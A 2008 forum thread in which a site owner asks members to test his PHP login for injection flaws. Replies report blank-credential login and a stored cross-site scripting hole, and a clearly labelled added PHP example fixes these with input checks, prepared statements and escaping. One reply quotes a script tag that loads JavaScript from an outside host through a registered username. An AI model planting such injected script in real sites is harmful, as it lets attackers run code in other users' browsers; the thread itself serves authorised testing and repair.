marklarah Posted January 17, 2008
First, I'd like to thank you all for helping me get the rest of this site up.
Anyway, I'm pretty sure my login is vulnerable, can you test it (mysql injections and such)? I have a test user on my site which you can use, but basically I want you to try and use a mysql injection to get in, and then let me know how so I can protect it.
http://tls-3.977mb.com/login.php
The test username is: olive
The password is also olive, in case you want to see how to log on.
Thanks. I'll post the source if need be.
p2grace Posted January 17, 2008
This should probably be moved to the "Beta Test Your Stuff" topic.
alecks Posted January 17, 2008
Well, first off you can simply log in as '', no username or password.
marklarah Posted January 17, 2008 (Author)
So how do I protect against this?
p2grace Posted January 17, 2008
In your function that validates the username/password, have it check if the inputs are blank. If they are, return an error.
marklarah Posted January 17, 2008 (Author)
Okay, done, but what about injections and such?
helraizer Posted January 17, 2008
If you register with the username as code there is a very big security threat.
http://tls-3.977mb.com/login.php
helraizer Posted January 17, 2008
Now your source has:
Logged in as: <script src=http://www.helraizer.co.uk/xss1.js></script> (10)
So you could be alright, it only diverts for me; I'm not sure, because now I can't log out.
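The three problems raised in this thread (blank credentials accepted, input reaching the SQL, and a username rendered as markup), handled in one login check. This is an added example, not part of any post and not the site's own code. The `users` table, its columns, the function names, the password hashing and the in-memory SQLite database standing in for MySQL are all assumptions.

```php
<?php
// Added example. Table, column and function names are assumptions; an
// in-memory SQLite database stands in for MySQL so the script runs offline.
function check_login(PDO $db, string $user, string $pass): ?array
{
    // Reject blank credentials before touching the database.
    if (trim($user) === '' || $pass === '') {
        return null;
    }
    // The placeholder keeps input out of the SQL text, so quote characters
    // in the username are compared as data and cannot alter the query.
    $stmt = $db->prepare('SELECT id, username, pass_hash FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['pass_hash'])) {
        return null;
    }
    return $row;
}

function render_banner(array $row): string
{
    // Escape on output so a username stored as markup is displayed as text.
    return 'Logged in as: ' . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8')
        . ' (' . (int) $row['id'] . ')';
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pass_hash TEXT)');

// Constructed sample accounts: the test user and one whose name is markup.
$markup = '<script src=//example.invalid/x.js></script>';
$ins = $db->prepare('INSERT INTO users (username, pass_hash) VALUES (?, ?)');
foreach (['olive' => 'olive', $markup => 'pw'] as $name => $pw) {
    $ins->execute([$name, password_hash($pw, PASSWORD_DEFAULT)]);
}

// Constructed login attempts covering each case from the thread.
$attempts = [
    ['olive', 'olive'],   // valid login
    ['', ''],             // blank credentials
    ["olive'", 'olive'],  // quote character in the username
    [$markup, 'pw'],      // username registered as markup
];
foreach ($attempts as [$u, $p]) {
    $row = check_login($db, $u, $p);
    echo $row ? render_banner($row) : 'Login rejected', PHP_EOL;
}
```

With a MySQL server, only the DSN passed to `new PDO(...)` changes; the prepared statement and the output escaping stay the same.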